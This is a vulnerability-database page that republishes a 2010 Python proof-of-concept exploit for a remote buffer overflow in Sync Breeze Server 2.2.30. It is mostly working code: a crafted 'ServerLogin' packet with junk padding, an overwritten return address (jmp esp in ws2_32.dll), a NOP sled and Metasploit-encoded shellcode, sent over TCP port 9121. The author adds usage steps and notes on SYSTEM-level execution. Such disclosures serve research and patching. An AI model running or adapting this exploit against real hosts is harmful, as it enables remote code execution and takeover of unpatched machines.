Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Sync Breeze Server 2.2.30 - Remote Buffer Overflow Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 24 Views

Sync Breeze Server v2.2.30 Remote Buffer Overflow Exploit identifie

Code

                                                #!/usr/bin/python

# Exploit Title: Sync Breeze Server v2.2.30 Remote BOF Exploit
# Date: 10/10/2010
# Author: Xsploited Security [aka xsploitedsec]
# URL: http://www.x-sploited.com/
# Contact: xsploitedsecurity [at] x-sploited.com
# Software Link: http://www.syncbreeze.com/setups/syncbreezesrv_setup_v2.2.30.exe
# Version: v2.2.30 (Others are most likely effected as well)
# Tested on: A Windows XP SP3 machine
# CVE : N/A

### Vulnerability Information: ###
# A vulnerability exists in the way Sync Breeze v2.2.30 processes its login requests after accepting a connection from a remote client.
# If a packet with a length greater than 484 bytes is received with the command prefix "ServerLogin." the effected Service (syncbrs.exe)
# will crash, from the result of a buffer overflow. An attacker can easily leverage this vulnerability and control execution flow /
# execute arbitrary code.
###
# This PoCs Usage:
# 1. Verify that the service is running on the remote machine, the default port is 9121.
# 2. Execute syncbreeze.py against the host
# 3. Check remote machines process list for calc to verify successful command execution. (Running as SYSTEM, on my test machine at least..)
###
# Other notes:
# If the software is installed from an administrator account, shellcode will be executed at admin / (system) level. This could be a potential
# privelage escilation attack vector (although I have not verified this yet)

# I am sure a lot more can be done with this (fit more shellcode, universal etc.) I'll leave that up to researchers however. 
# Have fun!
###

### Shouts:
# kAoTiX - Helping me verify this bug/exploit
# MAX - Keeps me entertained, makes me giggle
# CorelanCoder - Your tutorials are absolutely fking awesome
# exploit-db, offensive-sec, packetstormsecurity and all security teams and sites!
###

import sys,socket

if len(sys.argv) != 2:
    print "[!] Usage: ./syncbreeze.py <Target IP>"
    sys.exit(1)

about = "=================================================\n"
about += "Title: Sync Breeze Server v2.2.30 Remote BOF PoC\n"
about +=  "Author: xsploited security\nURL: http://www.x-sploited.com/\n"
about +=  "Contact: xsploitedsecurity [at] gmail.com\n"
about +=  "=================================================\n"
print about

host = sys.argv[1]
port = 9121 			#default server port, unchangeable (I think)

# windows/exec - 218 bytes / http://www.metasploit.com
# Encoder: x86/fnstenv_mov / EXITFUNC=seh, CMD=calc
calc = ("\x6a\x31\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x97\x8c" 
"\x8a\x10\x83\xeb\xfc\xe2\xf4\x6b\x64\x03\x10\x97\x8c\xea\x99" 
"\x72\xbd\x58\x74\x1c\xde\xba\x9b\xc5\x80\x01\x42\x83\x07\xf8" 
"\x38\x98\x3b\xc0\x36\xa6\x73\xbb\xd0\x3b\xb0\xeb\x6c\x95\xa0" 
"\xaa\xd1\x58\x81\x8b\xd7\x75\x7c\xd8\x47\x1c\xde\x9a\x9b\xd5" 
"\xb0\x8b\xc0\x1c\xcc\xf2\x95\x57\xf8\xc0\x11\x47\xdc\x01\x58" 
"\x8f\x07\xd2\x30\x96\x5f\x69\x2c\xde\x07\xbe\x9b\x96\x5a\xbb" 
"\xef\xa6\x4c\x26\xd1\x58\x81\x8b\xd7\xaf\x6c\xff\xe4\x94\xf1" 
"\x72\x2b\xea\xa8\xff\xf2\xcf\x07\xd2\x34\x96\x5f\xec\x9b\x9b" 
"\xc7\x01\x48\x8b\x8d\x59\x9b\x93\x07\x8b\xc0\x1e\xc8\xae\x34" 
"\xcc\xd7\xeb\x49\xcd\xdd\x75\xf0\xcf\xd3\xd0\x9b\x85\x67\x0c" 
"\x4d\xfd\x8d\x07\x95\x2e\x8c\x8a\x10\xc7\xe4\xbb\x9b\xf8\x0b" 
"\x75\xc5\x2c\x72\x84\x22\x7d\xe4\x2c\x85\x2a\x11\x75\xc5\xab" 
"\x8a\xf6\x1a\x17\x77\x6a\x65\x92\x37\xcd\x03\xe5\xe3\xe0\x10" 
"\xc4\x73\x5f\x73\xf6\xe0\xe9\x10");
	
# Begin payload buffer:

packet_header = ("\x53\x65\x72\x76\x65\x72\x4C\x6F\x67\x69\x6E\x02");

junk = "\x90" * 256; 			#265 byte junk buffer to reach eip
eip = "\xFB\xF8\xAB\x71";		#jmp esp (via ws2_32.dll) 
nops = "\x90" * 12;				#small nop sled

# packet structure:
# [header][junk][eip][nops][shellcode][nops][nops]

packet = packet_header + junk + eip + nops + calc + nops + nops;

print "[*] Connecting to " + host + "...\r"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))

print "[*] Connected, Sending payload\r"
s.send(packet + "\r\n")
print "[*] Payload sent successfully"
print "[*] Check the results\r"
s.close()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
exploitbuffer overflowsync breeze serverremotevulnerabilitywindows xp sp3remote clientshellcodecvesecurity issuepocprivilege escalationnetwork packetcontrol execution flowarbitrary codetcp portsoftware link
24